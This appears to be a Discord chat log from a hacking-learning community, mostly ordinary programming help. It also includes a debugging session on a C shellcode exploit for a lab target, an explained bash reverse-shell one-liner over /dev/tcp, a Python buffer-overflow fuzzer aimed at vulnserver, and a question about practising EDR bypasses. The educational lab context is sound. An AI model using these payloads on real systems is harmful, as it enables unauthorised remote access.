same thing. No segfault but windows target doesn't open a ncat connection on port 9999 which is what the payload does, it downloads ncat.exe and listens on 9999 on the target machine.l

thats why I'm assuming theres something wrong

Yeah add shellcode properly

thats why 0xcc is searched for in strrchr

Just to confirm shellcode gets initilized properly, and let me figure the 0xcc

ok

I dont understand what is arn

is that meant to trick you? should you be using \r\n

I think it's just malforming the http request as many times as it needs to so that its like
GET / HTTP/1.0
a
a...
xcc

Try it like this

#define EXEC"GET / HTTP/1.0rn""arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn""arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn""arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn""arn" "arn" "arn" "arn" "arn" "arn" "arn""xcc"

I'm assumed no because of the two strcat(buf, "rn") lines below strcpy() that are meant to be the 2 CR end of request blanks

it's concatenating rn at the end of buf so I'm assuming it doesn't need \rn

but I would have to escape that in C code right?

like\\r\\n?

also

I substracted 2 from pointer to get to x instead of c in xcc.

Idk if it's like that

but for addresses wouldn't a character be 1 byte?

if you searched for c or cc it would point at first c, so you need to do pointer--;

so only go back once

No I searched for c only

yeah thatn subtract once

pointer-=1;
or
pointer--;
or
pointer=pointer-1;

so wont strrchr() search for the last occurrence of c?

oh ur right

my bad

I thought it was first

then yeah go back twice as you said

okay so that's fine I guess

I can also check the address by doing &buf[strlen(buf)-1]?

I'll try taht right now

But yeah I did pointer - 2 and the payload didn't work

But I'm doing the nc command right I'm specifying the tun0 openvpn connection for communicating with the THM network

Ok try define like this:

#define EXEC "GET / HTTP/1.0\r\n" \
             "\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" \
             "\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" \
             "\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" \
             "\xcc"

and lets say this is fine, and also try to search for xcc now, if that works then we can move on next issue

This wont work, &buf is address and adding &buf[] is address of matrix

I got a segfault

let me do it to the two RNs at the end of strcpy

for the #define

let me check

Would that escape be fine?

I think so

hmm

not sure

why double \

"\"

\\

wouldn't if I leave it \r\n that would expand according to compiler parsing C code?

I searched for "xcc" and it says this

a warning.

In either case pointer is NULL and I get a segfault again

and you did "xcc" ?

pointer =strrchr(buf,"xcc"); yeah

let me keep that a's in

cause if I do \r\n\r\n the first 2 would signify the end of the http request

are you sure it does that

I think so

I thought it just adds bunch of white space

yeah http 1.0+ signifies end of http request after 2 Carriage return-line feeds which is /r/n

thats why it was two CRs at the end
strcat(buf,"rn");
strcat(buf,"rn");

buf is the malformed request

alr

I did this also and im getting pointer to point to xcc

add "" and move one line up

\

Oh I didn't know we would do \

ok

I'm getting NULL pointer

I got it again with removing \ from xcc

and now let me do it with \

check your buf, printf("%s");

what do you think about what I did here: u_char *pointer = malloc(sizeof(shellcode));

Should I have done it malloc(strlen(shellcode) + 1) ?

the +1 for null terminator?

sizeof shellcode should be fine if its not giving u error

no error

Ok im looking at some other code

and this is the way to do it:

#define EXEC "GET / HTTP/1.0rn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn"
"xcc"

but guy did a lot more changes

Check out if you want:
https://pastebin.com/f5H9JmNG

• in every line is what he changed ig

I will have to go sleep now, even though im sad we couldnt finish this till end but I gotta go, 9 hours of lectures tomorrow

oh wow thanks for searching that up

I wish you luck and strenght

and thank you for helping me

I'll continue with this.

@lilac holly thanks

Gave +1 Rep to @unkempt imp

rep

Oh right I completely forgot about pointer pointing to the address of buf and this print out of the request makes it possible to see that the shellcode is injected at xCC

and the 2 RN at the end to end the request

I'm doing printf from now on

So it looks fine. And it says its vuln but not being able to nc makes it not okay.

Learned so much C though

Hello people

I wanted to know

If I could get some advice on oval files

*pcap

OVAL definition files or pcaps? They are very different.

Ovals

Sorry

I mean pcap files

@magic falcon sorry for the confusion

So can u help me?

How can one practice EDR bypasses when most EDRs are paid and expensive, is there any free EDR which might be more challenging to bypass than an antivirus?

Hi, please limit these sorts of questions to #exploit-and-mal-studies

You're right that it's a major challenge though

Thanks and sorry, wasn't sure where to post this

I believe Graylog have got a free version, I see that one come up frequently on LinkedIn due to my connections. Never used it though so can't comment on what it's like

Anyone who is learning java here, i want to learn java

Ping me

Try the pinned messages and google

What discord library do you guys use?

for creating bots

discordpy

Hi today I came across a terminology "accelerated system sleep call" does anyone have any idea what it is about.

I think the question you should be asking is what language do you program in 😁

im trying out discordpy right now

how do you like... make it 1 column only

@narrow terrace - discordpy
@modest basin Discord.js

this but the field are only in 1 column

Are you saying you just want it to be like "test 1, test 2"
or like"test1, test3, test4"

test1
test2
test3
test4

like this

No clue how to do it in py but if you have the code, just remove the section that says test2 😁

when i try it out, it does is do

https://discordpy.readthedocs.io/en/stable/api.html?highlight=embed#discord.Embed

test1 test2 test3
test4 test5

inline=False

@hollow sorrel

add that to your fields

Thanks @surreal bronze , it worked 😄

Gave +1 Rep to @surreal bronze

@surreal bronze , have you been able to use paginations in discord embeds?

yeah

its not too hard

just edit the embeds fields and use reactions

Not the builtin buttons?

Or buttons that works too

I made mine before buttons were a thing

Mostly just wondering if there was some horrific incompatibility that'd cause you to use one over the other

reactions have been around for donkeys years so you'll probably find them easier to get help with / more stable then buttons which are quite recent, especially in dpy

If I want to make a simple media player is ok to use python?

try searching about the python module of vlc and libraries like pyqt or wxpython (for the gui)

question. Trying to git pull from a systemd service with git setup using a SSH key with a passphrase. (ubuntu)

I set the systemd service to be USER=$(logname) and GROUP=$(logname) and it recognizes the key in ~/.ssh/

however it tries to request passphrase. Which unless I allow tty (which I don't want will fail

debug1: read_passphrase: can't open /dev/tty: No such device or address
ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory

is there a way to allow my service to be allowed to use this file

without passphrase and keeping it relatively secure otherwise?

It's looking for ssh-askpass, maybe something to look into?

Create a new key without a passphrase and lock it down
How would you provide the passphrase anyway without it being stored in plaintext or otherwise recoverable format?

(I know secrets management solutions are out there, I'd push you towards those)

@onyx merlin do you have any recommendations to look into

@brazen eagle askpass is usually invoked if ssh-add wasn't used

which it was for root and user

outside of systemctl no probs

ran with systemctl that

alternatively, I could use personal access tokens and have no problem but felt ssh keys with passphrases was a more secure way to go

Is flask more of a middleware type of framework?

Thinking of an S3 -> Flask Lightsail type of website for a project I'm building. Its more related to a fast food ordering system

Thinking of what framework to build on

I mainly do Python but can learn other languages if need be

fair, not super familiar with all the inner workings of ssh 🙂

import random
print(random.Random(3168481).choices(range(14),k=6))

Run this and see if you can notice anything special about the numbers 😛

cute

does it work beyond 6?

ah nope, too bad

im having a little trouble with error codes in c, i have a file with a bunch of error names with numbers associated with each error but im trying to figure out a way when an error occurs, the variable name (which is essentially the type of error) and the value are printed out. any ideas?

Anyone has any tips for frustration when learning to code? I understand the syntax but I have a hard time applying what I have learned to fix the coding problem. Just did my first python course and it was on THM the most was easy, did 85% of the tasks on my own but needed a bit help on the other questions.

Break down your problem and the control flow either in writing or verbally.
People often get hung up on "It's not doing what I told it to do", without actually thinking about what you, the developer, wrote. Walk through each line of code thinking very specifically about how the computer is interpreting it, and you'll eventually get somewhere with that.

There's also the problem in some cases where you have the algorithm figured out, but you don't know how to express it, and that's what Google documentation is for.

Completely inappropriate. Do not post anything like this again.

This is how i feel like

Reminds me of ћ++

Just want to add that diagramming is also a thing that may help

Running a diagram tool against the codebase can also show what the control flow is actually doing, comparing intended vs actual flow is a very visual way to see problems

What @magic falcon said. This is why he gets paid more than me 😉

Unlikely! I am non essential QE, you are an actual dev 😄

I am dev in Europe, that means I get paid in peanuts and pizza...

Though actually starting a new project/role

Pizza sounds good...

Agree

what realistic programming projects do yall recommend in python? for beginner

does someone know how to code a simple three dot waiting animation in python
like
waiting...
yall get me? lmao

guessing game, if it has to be about hacking then directory scanner, port scanner, basic base64 encode/decoder stuff like that

I meant, as an everyday stuff, idk something like remaking craigslist with pure python, although i already started this project, its like craigslist but on terminal with like everything

Although just started making it, currently making the database with just file handling and python sockets

me personally i wouldnt call that beginner

https://tenor.com/view/loading-text-dot-gif-12910576

like this you mean?

exactly

but maybe more like

.

..

...

Hello guys, I have a question/problem about PowerShell dash sign. Currently I'm learning about PowerShell and when I try the command "get-help get-service -full" the -full part doesn't appear on the screen. And it executes the full part even though it's not there.

And here it executes the -ShowWindow part even though it doesn't appear

how can I solve this problem?

https://pastebin.com/raw/S26s7FQM

Do you mean that you type it, but it is not displayed when you type it?

yeah

Even though I write that part it's not displayed

and it's successfully executed. it just doesn't write anything that starts with -

Can you highlight the missing part in the terminal?

No

Like, does it show up when you click and drag?

No, it doesn't

for example: this is get-help get-service -ShowWindow.

but it doesn't show " -ShowWindow "

It sounds like a terminal color scheme or configuration issue. If the command is executing then it’s working you’re just not seeing the full input specified

Definitely, I tried a lot of things but haven't been able to solve yet

I would revert to a fresh powershell terminal if possible. I don’t know your setup but it sounds like a customization or program interacting with powershell is the root cause

That’s about all the direction I can provide, sorry

Thank you 🙂 I'll try harder.

No worries. Good luck. You got this! Maybe try googling for restore default powershell terminal. Just an idea, but you know your system best

👍

import time
for i in range(1, 4):
  print("." * i, end="\r")
  time.sleep(1)
print()

Knew I was forgetting something

Change your background color in your terminal to something like black. Your color for parameters probably matches your background color

There's an example here with a different "animation"

This worked. Thank you so much.

r u trying to print a right pyramid or something ?

A guy was looking for an animation for three dots 😛

The "\r" makes sure every new print starts from the beginning, effectively overwriting print before it on the same line

@sour compass Look up ANSI escape codes

https://gist.github.com/fnky/458719343aabd01cfb17a3a4f7296797

\r is a carriage return, it returns the cursor to the beginning of the line

we use \r because that's the C-escape code

and pythons interpreter is written in...C!

👍

so his code keeps printing line by line , cursor is not returning?

Follow the code line by line

for i in range(1, 4):
  print("." * i, end="\r")
  time.sleep(1)

i starts as 1

| will be the cursor
so we output .|, and at the end \r. The interpreter recognises this and brings the cursor to the start of the line |.

Now, i is 2, so you output .., and because the cursor is at |., it will be ..|

the cursor isn't jumping to a new line (normally, the end is \n which means go a new line

oh umm i get the code but when i tried that on an online ide it prints me a right Pyramid

like this

.

..

...

Maybe it doesn't support escape codes?

so i thought maybe his cursor is not returning

ohh

i dont have pycharm right now il try later tysm for the info man👍

Yeah, so mostly all terminal emulators support it but other ways of outputting STDOUT might not

i thought the /r seems buggy

in your case on the online IDE

oh i see ok got it

\r

It's an escape code

you need to do some experimenting on what \r is supposed to mean vs what actual implementation does

👍

and muiri pointed you in the right direction..... but manipulating file output like that doesn't occur the way you expect

👍 no i get its working, i thought in his program it was not ....but it turns out its just my ide xD

You mean how windows is just broken?

Though to be fair, windows implements line endings in the most literal way possible

part of it, yeah. carriage return doesn't have consistently on certain shells either ( I don't remember which one(s))

wat

some weird floating point stuff I presume?

Nope. Look at what the definition of parseInt does. That's absolutely intended behavior

oh wait, i missed the last one

That.... is weird

which language is that in?

js apparently

just tested it now

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/isSafeInteger

that should be in the allowable range, what environment are you doing this in?

Just opened up Dev tools and did it in the console

Oh I see

It parses it to 5e-7

if it does that, it should throw NaN and not zero

official parseInt() docs say that e is not a valid digit and so should return NaN.

there's a clarification that if the first digit is valid and a succeeding character is invalid, the value is truncated prior to the first invalid digit

Yup, hence why it's 5 I guess

Well there's your problem

You really expect JS to behave even remotely sanely?

If it behaved even a margin more ridiculous then I would expect to see it in white makeup, a massive wig and a bright red nose, making balloon animals whilst grocery shopping at an aquarium

Just remember that everything is a string, especially when you tell js it isn't

this is a line shadow thinks is kinda amazing..... if shadow could put messages in #764491023127674910 this probably would end up in there

That's TCL

@pastel grove has been warned.

Been working in js and PowerShell full time for a while now, and the loops you have you jump sometimes is amazing

"path" is ambiguous in how you're describing

the volume is a file on disk that docker manages and knows how to provide to containers. Typically in a docker-compose, the volume path is the path inside the container where the volume should be mounted

Guys I’m having a bit of difficulty with building a round robin load balancer with JavaScript was wondering if anyone could give me some insight

Docker volume can be a bind mount as well, which maps to a local dir

Think about what a round robin algorithm actually means and build from there

How to write pretty codes instead of using 30 variables and another 50 flag variables to cover edge cases

It's a case by case problem, but the book "clean code" is very good at exactly that, if you want, you can send me your code and I'll try to point out some fixes in this particular case

Thanks I was hoping for book recommendetion, I will try to get it and read it, also I will dm you code

Gave +1 Rep to @earnest swallow

Happy to help!

TDD and BDD are industry standard practices; my own experience using them as a base methodology shows code is much cleaner when written with them.

Test Driven Development by Example by Beck is a great introduction to TDD. Don't be offput by how old the book is, IMO it's still the best intro to TDD.

Thanks will look into it

Gave +1 Rep to @magic falcon

Hi everyone. I was going through the Zero Logon room: https://tryhackme.com/room/zer0logon and on task 3 a Python script for a Proof of Concept is analyzed. In that code there is the following line if not (3 <= len(sys.argv) <= 4):

My question is, is that line not the same as: if not (len(sys.argv) == 3): or even simpler if len(sys.argv) != 3?

The task text says that with this line: "we are checking for the amount of parameters, and ensuring that it's exactly 3 (zerologon_tester.py DCNAME IP)"

They're standard best practices but not many in the industry use them, sadly. TDD requires much more discipline.

the original line allows 4 parameters as well, wierd

which is sad, because it requires basically no discipline

Yep. I also realised that. Really weird!

you have to stick to it 🙂

also requires more discipline than winging it

Hi All, please i need smtp

Hello Hackers,

I am makeing a script to install Go language automatically but when I am trying to define path variables using sudo. I am getting errors.

Reason 1:
Why I am defining variables using sudo because I want to install httprobe and many more tools using "sudo go install" command.

Reason 2:
If I run go install command without sudo then I am getting errors.

Thank you in advance
It will be highly appreciated 😇

do you really need sudo for that?

Go install should be ran without sudo, the usual location for go programs to be installed in that manner is ~/go/

^

Are there who can programming in C language ? Ineed help with hw.

@ancient dagger we don't do homework help here

Hi, everyone

How are you?

Nice to meet you

I have good experience in mobile and web applications.

web: react, vue, node, angular, php and so on

mobile: React Native, Flutter, swiftUI, java, kotlin.

Thanks.

I program in C, can't do your homework but can teach maybe so you wont have problems doing it yourself

can you tell me the best place to learn C ?

No, but I can tell you how Im doing it, college + competitive programming. I learned a lot doing the competition problems, they really make you think and understanmd 100% of what you are doing. I can spend up to 5-6 hours just figuring out the proper way of solving some problem and in that time I learn a lot and how some small special things behave in C

check the pins for some fun sites

CS50 is a good place to start for learning C

can someone explain to me how "bash -i >& /dev/tcp/xx.xx.xx.xx/xxxx 0>&1" works

I am not sure I can follow what is redirected to what

Break it down to components.

1. What does bash -i do?
   2.What does >& do in Linux shells?
2. What is /dev/tcp/host/port or in general, what is /dev/proto/host/port ?
3. What is 0>&1 in this case?

1. starts a interactive bash
2. not exacly sure, I guess redirects stdout to file
3. tcp port
4. redirect stdin to stdout?

bash -i
This command launches a Bash shell with the -i option, which stands for interactive mode. This means that the shell will remain open and interactive after executing the command.

>& /dev/tcp/10.0.0.0/9999
This redirects the standard output and standard error streams to the specified IP address and port number. /dev/tcp is a special file system in Linux that allows accessing TCP sockets as if they were files. This means that the output and error streams will be sent to the specified IP address and port number.

0>&1
This redirects the standard input stream to the standard output stream. This means that any input received will be sent to the victim's machine as output.

Hi guys I have C related question.
This is my code

#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[], char* envp[]){
  int a = strcmp(argv[1], "\x00");   // not 0
  printf("a : %i \n\n", a);

  return 0;
}

I then did these commands (a.out is executable of the code above)

$ ./a.out "\x00"
$ ./a.out '\x00'
$ ./a.out \x00

I expected at least one of them would return 0 meaning the argv[1] and "\x00" in the source code is the same. But none of them returned 0. Why is that??

\x00 is not 0

it is null

the null character is not printable

Also, return 0 indicates successful exec of code

As the above said, you're currently comparing argv[1] to the string "\x00". Instead you need to compare it to NULL. You can try:
if (agrv[1] == NULL) { //code here }

Try this:

$ echo -ne '\x00' | ./a.out

oh noes.... not the broken echo binary

Hi everyone what is a good book to learn API programming ?

The Holberton school Software Engineering coursework covers C really well, but You'll have to enroll to the whole 12 months course to access it.

Is there a way that with every push of my code, I "rebuild" my discord bot

is that CI/CD...

Yes that is CI/CD

Are you using GitHub?

Mhm mhm

GitHub Workflows is the way to go

I searched it up and it is ALOT

can you recommend a simple way of implementation through workflows?

Are you using discord.js or discord.py?

I think I remember you saying earlier your running discordpy

Just have to be sure

What do you mean by "rebuild"? Like re-running it with the updated code?

^^

Just what I was about to ask

Yes this

Where is your application being held/ hosted?

discordpy

Not anywhere aotm

hi

I'm planning to host it on a VPS but docker might not be available with the cheapest VPS deal

can I ask about a bof script issue here ?

So you'd need to make a workflow that every time there is an update on the GitHub, you server will pull the changes and re run it

Yes this exactly

I'm looking at the push event as the trigger but after that I'm lost

why does this script crash my vulnserver (expected)

#!/usr/bin/python
 
import sys, socket
from time import sleep
 
buffer = "A" * 100
 
while True:
    try:
        payload = "TRUN /.:/" + buffer
 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.1.23',9999))
        print ("[+] Sending the payload...\n" + str(len(buffer)))
        s.send((payload.encode()))
        s.close()
        sleep(1)
        buffer = buffer + "A"*100
    except:
        print ("The fuzzing crashed at %s bytes" % str(len(buffer)))
        sys.exit()

while this one doesn't

#!/usr/bin/env python3

import socket, time, sys

ip = "192.168.1.23"

port = 9999
timeout = 5
prefix = "TRUN /.:/"

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

even though they're sending the exact same strings

Okay, so you're basically staging your application.

For a normal application there's the name

Name: Discord.py Bot

Then there's when you want it to be executed

on:
  push:
    branches:
      - main # only execute when pushed to main

And then there's your jobs.
Jobs are what tasks are going to be taken out to prepare your code.
For example,

# Define a job named "test"
jobs:
  test:
    # Name the job "Run Tests"
    name: Run Tests
    # Specify the operating system to run the job on
    runs-on: ubuntu-latest
    # Define the steps to run in the job
    steps:
      # Check out the code from the repository
      - name: Checkout Code
        uses: actions/checkout@v2
      # Set up Python environment
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          # Specify the version of Python to use
          python-version: 3.9
      # Install dependencies required to run the tests
      - name: Install Dependencies
        run: |
          # Upgrade pip to the latest version
          python -m pip install --upgrade pip
          # Install the required packages specified in requirements.txt
          pip install -r requirements.txt
      # Run the tests using pytest
      - name: Run Tests
        run: python -m pytest

CI/CD always has a testing phase to make sure the code is up to scratch before it is pushed to prod

It's a lot to learn trust me, but once you do it once, you'll probably never have to do it again for that application.

Where does it build this?

Their docs are really great, I would take a few hours to read and fully understand them

Did a skim of the documentation and reading through the config you sent, I would have to add another job that is titled Deployment so I'm able to deploy my application somewhere?

Mhm

I didn't supply that one so you could think about it:)

Ah, but the deployment is only available thru cloud providers, no?